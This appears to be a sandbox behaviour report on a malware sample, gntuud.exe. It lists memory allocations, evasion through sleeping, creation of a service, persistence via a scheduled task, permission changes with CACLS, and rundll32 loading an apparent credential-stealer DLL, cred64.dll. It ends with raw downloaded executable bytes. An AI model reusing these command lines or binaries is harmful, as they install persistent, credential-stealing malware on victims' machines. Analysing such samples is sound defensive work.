stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04889000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0488a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0488b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0488c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description gntuud.exe tried to sleep 161 seconds, actually delayed analysis time by 161 seconds
file C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll
file C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
file C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
file C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
file C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
Time & API Arguments Status Return Repeated

CreateServiceA

 service_start_name:
start_type: 2
password:
display_name: Ghijkl Nopqrstu Wxyabcde Ghij
filepath: C:\Windows\rerzsi.exe
service_name: Ghijkl Nopqrstu Wxy
filepath_r: C:\Windows\rerzsi.exe
desired_access: 983551
service_handle: 0x005444f8
error_control: 1
service_type: 272
service_manager_handle: 0x00544598
1 5522680 0
file C:\Users\test22\AppData\Local\Temp\4ca685c424\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\4ca685c424" /P "test22:N"&&CACLS "..\4ca685c424" /P "test22:R" /E&&Exit
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline powershell -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANgAwAA==
cmdline C:\Windows\System32\cmd.exe /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
cmdline "C:\Windows\system32\cmd.exe" /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANgAwAA==
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
file C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
file C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
file C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
file C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
file C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
file C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
file C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
file C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\4ca685c424" /P "test22:N"&&CACLS "..\4ca685c424" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
parameters:
filepath: C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANgAwAA==
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $_ù䫘Šø˜Šø˜ŠøÈê‰ù˜ŠøÈêù’˜ŠøÈêŽù˜Šøyàù0˜ŠøyàŽù ˜Šøyà‰ù˜ŠøÈê‹ù˜Šø˜‹øx˜Šøšáƒù˜Šøšáuø˜Šø˜ø˜Šøšáˆù˜ŠøRich˜ŠøPEd†ï7”cð" â @O@@`ÁäPÀ@a`8F0`® T ­ @ 0.text€á â  `.rdata¦! "æ @@.dataX&0 @À.pdata8F`H@@_RDATA\°\@@.rsrc@aÀb^@@.reloc0 À@BH‰|$H‹ÑH‹ù3À¹0óªH‹|$H‹ÂÃÌÌÌH‰\$WHì€H‹ÔH3ÄH‰„$p"› 3ÀH|$( $› ¹0I‹Ù)D$` › HÇD$ óª·&› f‰„$˜HD$`)L$pHƒèò › )„$€ÇD$(0ÇD$<òŒ$€fƒxH@uõ‹ '› LL$ (Ӛ L$œ ( ՚ HT$((֚ H( ۚ @ òߚ H0ò@@‰HH· ؚ f‰HLHL$`ÿíñ H‹L$ H‰ H‹Œ$pH3Ìè%>H‹œ$HÄ€_ÃÌÌÌÌH‰\$H‰l$VWAVHì H‹ŒH3ÄH‰„$H‹éº3É»"Àÿ|ñ ř ‹ð3À ʙ E3öH|$H¹0)„$€¾™ L‰t$@óª·ș f‰„$¸H„$€)Œ$Hƒèò œ™ ÇD$H0ÇD$\)„$ òŒ$°fD9pH@uõ‹ Ǚ LL$@(s™ LĚ ( u™ HT$H(v™ H( {™ @ ò™ H0ò@@‰HH· x™ f‰HLHŒ$€ÿŠð H‹|$@…Àu2H…ÿtBH‹HR™ D‰t$(E3ÉL‹ÅD‰t$ H‹ÏH‹@Hÿuð …ÀAIÞH…ÿtH‹H‹ÏH‹BÿZð …öuÿ ð ‹ÃH‹Œ$H3Ìèn<Lœ$ I‹[(I‹k0I‹ãA^_^ÃÌÌÌÌÌÌH‰\$H‰t$H‰|$UATAUAVAWH¬$@úÿÿHìÀH‹ºH3ÄH‰…°H ᘠÿãì H‹ÈH±˜ ÿ»ì H‹ðH…À„šH ¸˜ ÿºì H‹ÈHÀ˜ ÿ’ì L‹øH…À„qH ˜ ÿ‘ì H‹ÈH¯˜ ÿiì L‹àH…À„HH f˜ ÿhì H‹ÈHž˜ ÿ@ì L‹ðH…À„ÿ>ì 3Ò¹8D‹ÀÿVì H‹ØHƒøÿ„ü3ÿLD$PH‹ÈH‰|$ 3ÒH‹ÆDO0ÿï DOH‰|$ LD$0H‹ËHT$Xÿì …À„ºH‹T$0DOHƒÂH‰|$ LD$HH‹Ëÿïë …À„’ºHM€ÿë L˜ ºHM€èsI¹èíILE€ºH‹ÈL‹èèaHH‹L$0I‹ÇH‹I8ÿcî H‹L$0I‹ÕI‹ÆH‹I HƒÁ`ÿJî H‹D$0I‹ÕH‹H I‹ÆHƒÁpÿ1î A¸H• 3ÉÿTë H‹D$0H‹HH‹D$HH‹qH‹HH‰L$@A¹H‰|$ LD$8H‹ËHT$@ÿë …À„µH‹T$8L…H‹ËH‰|$ D·JJH‹RPÿçê …À„ŠH•H è¬E…ÀtH‹D$8H‹H‰L$@H;Îu†ë*H‹L$8I‹ÕHƒÁHI‹Æÿoí H‹L$8I‹ÕHƒÁXI‹ÆÿZí H‹L$0I‹ÄH‹I8ÿHí H‹Ëÿ7ê H•HM€è?E…À@•Ç‹Çë3ÀH‹°H3ÌèD9Lœ$ÀI‹[0I‹s8I‹{@I‹ãA_A^A]A\]ÃÌÌÌH‰\$WHƒì 3ۍ<‰ÿËËÿöé ;ß|òH‹\$0HƒÄ _ÃÌÌÌÌÌÌÌH‰T$‰L$¸ìè}Ì H+àH‹kH3ÄH‰„$ì¹0uÿ­é ¹è“ÿÿÿ¹4ÿpé ‰D$4ƒ|$4u ÿé ƒøt3Àé¿4è6üÿÿƄ$"Ƅ$"'Ƅ$"7Ƅ$"ÑƄ$"øƄ$"%Ƅ$"OƄ$"yƄ$"§Æ„$ "ÍƄ$ "÷Ƅ$ "!Ƅ$ "´Æ„$ "ŠÆ„$"ŸÆ„$"ÉƄ$"KƄ$"Ƅ$"GƄ$"qƄ$"›Æ„$"ÅƄ$"ïƄ$"Ƅ$"Ƅ$"mƄ$"—Æ„$"ÁƄ$"ëƄ$"Ƅ$"?Ƅ$"iƄ$ "“Æ„$!"½Æ„$""çƄ$#"Ƅ$$";Ƅ$%"eƄ$&"Æ„$'"¹Æ„$("ãƄ$)" Ƅ$*"7Ƅ$+"aƄ$,"‹Æ„$-"µÆ„$."ßƄ$/" Ƅ$0"3Ƅ$1"]Ƅ$2"‡Æ„$3"±Æ„$4"ÛƄ$5"Ƅ$6"/Ƅ$7"YƄ$8"ƒÆ„$9"­Æ„$:"×Ƅ$;"Ƅ$<"«Æ„$="UƄ$>"Ƅ$?"©Æ„$@"ÝƄ$A"âƄ$B"Æ„$C"_Ƅ$D"{Ƅ$E"Ƅ$F"ÆƄ$G"4Ƅ$H"Ƅ$I"õƄ$J"vƄ$K"íƄ$L"Ƅ$M"ÔƄ$N"KƄ$O"!Ƅ$P"Ƅ$Q"îƄ$R"çƄ$S"Æ„$T"iƄ$U"*Ƅ$V"Ƅ$W"ëƄ$X"¢Æ„$Y"€Æ„$Z"7Ƅ$[""Ƅ$\" Ƅ$]"ûƄ$^"ÑƄ$_"†Æ„$`"gƄ$a"Ƅ$b"Ƅ$c"ôƄ$d"›Æ„$e"—Æ„$f"zƄ$g"WƄ$h"CƄ$i"äƄ$j"ÙƄ$k"ÁƄ$l"OƄ$m"zƄ$n" Ƅ$o"©Æ„$p"ÞƄ$q"²Æ„$r"cƄ$s"TƄ$t"uƄ$u"ˆÆ„$v"¢Æ„$w"ÓƄ$x"'Ƅ$y"-Ƅ$z"WƄ${"Æ„$|"«Æ„$}"ÕƄ$~"ÿƄ$")Ƅ$€"Ƅ$"8Ƅ$‚"§Æ„$ƒ"ÑƄ$„"ŸÆ„$…"£Æ„$†"MƄ$‡"yƄ$ˆ"Ƅ$‰"yƄ$Š"ÂƄ$‹"ËƄ$Œ"KƄ$"uƄ$Ž"ŸÆ„$"ÉƄ$"óƄ$‘"Ƅ$’"GƄ$“"qƄ$”"kƄ$•"ÅƄ$–"ÁƄ$—"9Ƅ$˜"HƄ$™"oƄ$š"§Æ„$›"ÁƄ$œ"ëƄ$"ÑƄ$ž"?Ƅ$Ÿ"iƄ$ "“Æ„$¡"¹Æ„$¢"
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZ€ÿÿ@@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELª¼’cà G82 –`@ à ˆ\™ª`Æ.bss°ÀÀ.data”À–@À.text7`8š `.idataˆ Ò@À.itexte°Ô à.edataÕ6À8Ø à.rsrc\™š@@æo¨OäsTâytœÚe g®ä]]Η§†Øt”ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢hæôéuÛ j̵ĺÊ—Q¥Å¢¦±èKþÿb3®Îx-ü…dšÇO÷¾*+…U;á µ˜Ž(¥¬Ò#ífk£xGV»¢¡Ûzaʏ½, nŠm +ó\WñŽß‹¥˜«./À`™«Ÿ.Ówæ];ÕÊø$µlûí¿µ ¸ŽŽåq_½H83¿ºÀSCIcàI¬=Kðü!=œƒˆ7M´ÖO€$ØÁ›¥ ·Á)‚M›u›=Ã,-kùOѹ0ɟÅ(wõäLREª"š)1À™Ó]C¦Ó¦±ã‡ –ñv¹B®°ç„)n½¶ê“²2rUWßînÐj7Õô•ÅØV Ì|@Î*ZZŠ—9„ƒuƒ†âtrîÊÐÒÐqþÂýÎ|qkåÑÙÚ.fWt^|áËÏPWy…é‘v34‘°¦µ2ûypڞ…bþ-VŽˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢28½‘>K"ΜòL(§Vù)K Y8oÁâ*×jº’O,ر k“‹3ñ±¦s(P³ŒÛ1›é{y7¹À%T½Š_µ/$š°HÜmc¾ûÂp6øþGãy󂍥=ä å3|îÊÌ÷™âDµÌôfü“ɪ]…{ir€ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ë–ž(ŽšÑ(ÑݭsJX†çÜA®M Q‰™‹LGî¾W6øï ð¬ÌLô˜îŠL´Gü:«Ü‡+±Â€ƒìdC˜ûÚ7ÛÂ;Rc Ðhpǘ(#3W¾Cº¬`ˆÌ£ Iîi®­®òbJÖLv]¤±4=6±§åœ#ÑP¢™O SƒåBlOŠF™á¥3o&…K±fÑ¿ªe ú‡¾¤…~VCNÕPáí±UcâJx6{ΊDŒ÷²¢eße®HÇz}jS¢³á*°E,“E7ñà.ÀM¹ԀM­½ÿÚ@xåÁh‘¹ …kj¶ÑÎ1·¡§éƒšæÝÁzhv¿·V&Ý/¬£ˆ YSœ I£ã`—3ԻʆWxŽŒØ&¤éÛ3owºÌ•S¬ECÙÃøf.᫓¤¼ï [0hzÎþ<®*BL6À³ìQsɆ ‚þ=Qz ÔøÃĶa®gº-saĘ¯ÙÊ°mxô–f#ì&õ¥›m0åRߣ#@I/ç†e²>”—Žæuc9{9 ÅÅþ[5ÊÝ i&l1F”3æA©2äÉr™ACÒ ]R@×i@hB__ºä ~ˆ­âWL¶’ܘjlÙ¦˜Öüèÿ¤È¤p§á›Ñäy2Kçcޑ4œñ<­‰þáK„?f·ˆR¬© p¸hÜ£9r• ÷ źÙýN;ÒK\•.YÅN…÷Ïç´ •ÅS1ŒÇðéô™#rÞ Z•Ñ\ U\—ä62y/¯þtuúÙV´wۈŽbñ±¬Ó<Šð—Å{ !×෕ 紝Ï6>÷⵶ùþËwð5k°a]@Öáãêú•å(8lœºÁ@¢òjaZ VæÞ½£ðþÌΦ79Esš{/ï>œõœ¡›ê*<ùyÖý¯ë#Œ6È磳ðÉñõ³¾b9ÁÕÁkºÇ÷ÁÍɀ×TÚݘhQ×¼åÐÌr כ»h▌œ?¯­«Ç~ø¯ $–ü X†ë[ôjW,ÿÚ¹RSˆd"Øͯ”‚ý*Æmj!à[rÊ'X­q.¸¶-.¬ÔO+qµ²ãÚԏïDù!Ä2þwNºl­|å-2Ïd8ÉÁ<b6çËÈ =!tìû²šE[$"ïkM+8=(A)²ÞÍÕ·öt!y7HÁ/Y¡¯•t Ã¿/tÁb^ÏtPOzd+àn~C˜Þÿ¤e¯£îþS>>’lNÂM²“ÿƎqÓÆþ,¡}ÝBŸg¼£¼@(œöŸ¿}´íúŠî'òÙi",»lð‹qe{£®u"Նg™!¾#í.GÖß}ß¹ëêeÉ´ß{ OìŸ2¥&˜ZCVúþ èÁÌìûԌS bîÆC`¡X¾IF-]Và…§r­Ý'£Ù„‡…ô̍›£áôW€qœØ’µ¤˜/GU0‡:+Ï^œÃ’û0?èöõÿÃE“of®DÈIÁj¶©ßûÑȘä€ÌÈ j2sšu'µÙ£ áùpâú·y[m9•ðs•pˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ÂWÀooË'O2g½DWå5²Ãd˜*÷`ÄWºˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢t×ÕG¦•v½%cÙdØ#”2 wÈk1â3ÆT™‘¡Îÿ£28HéøQ'¨7MÀVÛºˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢t×ÕG¦•v½%cÙdØ#”2¯Ó¯à™di·¹ &b#‹x ‘ðGº5ͽ§YRðòå Èß T/Þú×6Ž±ÍÓ;ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢ˆx&iÖb‰¿Ø€‡½¢œf¹lòJ¿_:Ê쫇~¯& dè¬Fš*ñRþàJj½¡¾5$’¶b£>d&W*Ÿñ‰Õÿvjæn`à_ ¤Ù²‰´C)ûÀùâm`3ÍÞáر>w^Œ†_½»x”e+¨OÃåKùe—QÕýÎ0»
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZ€ÿÿ@@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL4’cà G8L f0@@z!pˆÐdfÄ.bss0ÀÀ.dataà@â@À.text708æ `.idataˆp@À.itexte€  à.edataÕ68$ à.rsrcdfÐh\@@.äôrdárß«+òƛâDG§lò#YZ–†.&¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗt XÕÌZ"Û{ZDO™ª-nÚ}eRÆQô3JªO·‚ß?¸oˆ+ĤmÒ}gûbžÙùōÀ£é¼ËèÕêC‹Ö]Cþ‚*ïš @é!¶/öð¼üÈGxˆ1%Q¨‡ÓÐᰠĤŽ_•1ßçęӕkÛ;GFËv )’½„óì0ÄoùÖKÆICÊK2Dq a)î;íÒÊv› ”̯Ì-ïÔS/*5m÷êÕ £Óy?°ÊÕUJÀ̈§zã–p¤LçácŽæI¼•!§¦7šÊq¦胣GÉ[jí;êR㦔&DÐyŒ'ÃZj Êo2l†ë€îԲŀ–Y'Ú(Ù®ñ¶.PDäµ=~®QéÉb®Ï&B“„3Í#{:ì\d¨Ö¦œ0€0/9&Σ¦Uœ6–¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗè@Vp1¯Dµ°dÌ/g#¹üGYք/o¼¼fɳ0Gs)ôU6ÔQ½æDøól).Pò•Îk“Ékn„3)¯¦¿ƒ&ùaӞ•²²&³³ßˍ¡ÿ²¸ú§ž|a~FN“I›m©( ÚÂð–Íø”–5›ñè‹N™uyâ&_úÙA3§9 ïÄwü·iEòÐy¦z<U¥j)ÿ®nÉè‰|5¹"\µÔ0̈ã~@þÍJäÐ?×I=Ø]%¿Vj`sAÍêbå¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗ¢Rqp+Hãm×Ùæ÷ʗßœM×N0Ô83Ó,ê4ïæ䮃œÈTx>”·™@p1p֎ղ®7©ÀmÙÝ׈Ëh‰±Ù¡¥ ûµÄQ :úõî³ÝWÇÆKžñ¨ÞFæ væÕ!ۘÁ/÷ ¿¨ú<ãÚúüûCóoPöe½f—©Y"Ø7{"øc ¸±Ì$Ø3 Û ¬½ó(ÝÐü-0ùò²Ûf¤9ò­ ±óeØ‹ÄFÌ@Œ‹<ÇúRldx<²´ý°ûYìôGU·`ø‰‚Ö 8)i”T|n­ØÓVp©p&×K3=w-‰n¯170Qt¸ÉMxÏ l$¯¤ö<ÇÑ(Ü».ìÌ÷èdø®ç,{]í.k‡õ!мŸ §8H$¸Û8µöªÜFµIÌW¬é¿í²ç{$aP€È{ږ¼_°“ëð‰~*̀²ú±Í&ZÂɲšI üâ$}'ŸTQIG¼'Ræº[ɝþ4 £—ó1¿l®-7 D³ë2«íYtö©ÌŒ:8’ØK+D ßLö©'Þöžžâ<`Y"ÑÝqÿúÒ癭øÁÃe~bÔ½iÛA†áã÷±èið°åîaeÛÆï-ö«¬År¬öìÅÄÒê56jwYV'3#C-¿î¼(…C^ãiƒªfGyEl`íQrÑì§híXpnåi¨7þ¤µjÓÐrh´Bž–%@~g¦ùCö£J|ôLH›Ïs@ûnÑNST=þé¹3¼™I›Ö^b=çkTڋ }4î:n"ƒÌ"ÿés½`z‘_*¤ *)V¡Ž¶"ËòÉkL.PZb¿Œ¾ƒA«¥¬M?”) Ÿ‘*yö¢Ôàã|º´­äAÁâô¦_ ̬Êþ¼ö„¢Ëªy*zU¸øx ä0={‚ÑF„›zÚ],$4ùˆÓ<„ðGèÝC{â<ÉW“?ÿÄ c€”öÚ/…Sf›<•ƒÏOg¹™1<j­ÿžXr­˜BvhÀÉ)ÁHÚ«í_É ùí@¢ä1z—œ73ςž F»-ˆAíü¦@‰÷tÒ¥$šyRj=Dj÷ òTõ^ŠW>Ï×^òür`»z)ÅgÜàh %>÷ޘä&ªú}pÈÌJ;Ÿx ˜‘ú'•Áý›ÎóÎr,cYd稬›" ô÷d°£<DõŒ!dSo̳k:'§©ù†€Åƒ0‡Ú(£šz1²Œé¦Ñ~Òp†¡h[8퉓B8 ½~Ͻ˜4~¯¸.9K#­ž×Ýö»Í˜ÅÞ9ÅÕ¼Íô}B‰:s*ãò[ˆG»Í 7×}„‰îzÚæ4»9Ö$!íÈpQ -}¿[xÈRP)?ü\f[ø‘sb¦’½£V8•~H+—¸ÙüÉ''_2HÎéèbl‘pöùÛh ÿÛ¤lYO[{&LIr»Ny|Ç1ÎZì"UÐފ£)ÉXggÅuñîüõ]½±µår‚RŠŽ„û[ ÓqË3ñíxóLýs$tÜ\¢Ižl¿ŸÒÌbBð>"¯©#Bvµ>(4QnZÖ¦ö˜>å[¬ ç«Õ!pwõÙ2,Ë4ƒC5æ¢Áð‹å€ Ÿé¥Q‚Ì’ØÒMîH¥–Ñ'ô>7©vœ_¿@AHÁ|mó*ŠŸyß0Ý¦ - ¶ÄBu®ŽÛ+ùŠ\蔃– ”̨Íû0ò\gMȉ´¾‚äÉQä•ÈDZbÏ籋ŒÂçXqBêkâMFØC¾0\àÆõÐol…€ Tâ`(H¼ä¦A'ÐËJDª_Üô~* DßÒÏáômêÎD4‡R†Z`GLa1UOŽÛDÊߌgñXF7Ó9ª-ÿ'R¢1 ÔX§¦ƒžD? >ºï‚OÁg'Ú™¾_Øóó±)DÅ÷ÛýD…% Êéö‚±ãü#¼?¿DN“…Ú1ÏÝèlõ-X੍€¨Ûb&Ynòw·†‘*7Ãᛑ'nû]ÃĪutFMïÚ_·/=æ‡ð9™4I[’CïV+F|$!á¢üIãÿ!1?ËVb€yŠ§}¾y ìJqüƏS‹bz™ -a>+•¿3!þÂkÉö"…[¥r6‰„•J7ê:O*ƒU¡à|.'e½8ÇGÈ/—Ýë‹äAŠiÔÂÄRåˆõóO4›®,p roÒp˜Fq‘W=}|ú@åWj¬¡¨)Ä[;@Éï½÷÷‰%»f' Ñ\nÐ `I›“F*”ÿ+&/}"]¯LS+Ì\,“K•”ê¢Jh5åJYý»±{”;2}ÎË·h-AÆԑæ»kø‘Ï ƒHíÁ\k"uE¥:dt8¹ŸÌ« slSã1€;¬þ–óå˜Nñ¤ƒz‡ChZT@Ñ»Õç]j+'Já”ôï¶RÿÉÈD—”kª2ÀCŽ™Q †–™"øÇ0hŒh°Ý;ÞL ^¤nEybŒx뚠dïM7ÌÏùr<Îÿ×D|toœ Rò 0sV‚kNӗ7î$Ùýœ.OGÚ# óã}™Û‰ÊÚÕËVS'ª¯d\: ڕõEF!2æïÿtGëgì§G«/Ljã™!ýò³K\Ñõ5 <N<˜Zdû­äŒ›ý´~­D~7¦.:Å !%ë™ ¬e¤pý’
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELªœ–cà .#rM# `#@  #`…(M#J`#¨€#  H.textx-# .# `.rsrc¨`#0#@@.reloc €#6#@BXM#H„<#¤0 -&( +&+ö*0f+5+6t,!&+2+3-&+4,&+5+6+;+<o + +Ý +â +å*+È( +Ã+Ëo +Æs +Å+Èo +Ã+Âo +½Ž #%Ð-&&+++*( +ö0í- &:Ð8Ë8Ò+î+d-1&rp,.&+_+g8i8n8oŽi8i8j+ -+Ê+Ï  Ži]‘‘aҜX , Ži2ã,«Þg(8’ÿÿÿ( 8—ÿÿÿ8’ÿÿÿo 8ÿÿÿ 8Œÿÿÿ8‹ÿÿÿ8ÿÿÿ 8ÿÿÿ&,#$@( ( Þ%,X ?5ÿÿÿ** 8(ÿÿÿ¤»º( ,&þs - &&+(+å( +*0L+-,-ù+){, ,ñ+ {++!+"-&&++,ð+*+Ð+Ô+Ýo +Ý+Ü+Û( +Ý0+9¶8Ú8Û:³&&8Ø:°&8Ò{8Í8Ò{ A 